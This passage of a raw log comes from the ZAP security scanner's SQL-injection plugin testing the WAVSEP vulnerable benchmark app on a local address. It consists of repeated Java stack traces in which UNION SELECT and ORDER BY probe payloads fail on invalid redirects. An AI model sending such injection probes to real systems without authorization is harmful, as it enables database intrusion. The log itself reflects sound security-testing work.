org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688331 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688333 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688334 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688335 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 8985-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 8985-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688337 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688339 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688340 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688341 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688342 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688343 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688345 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688346 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at 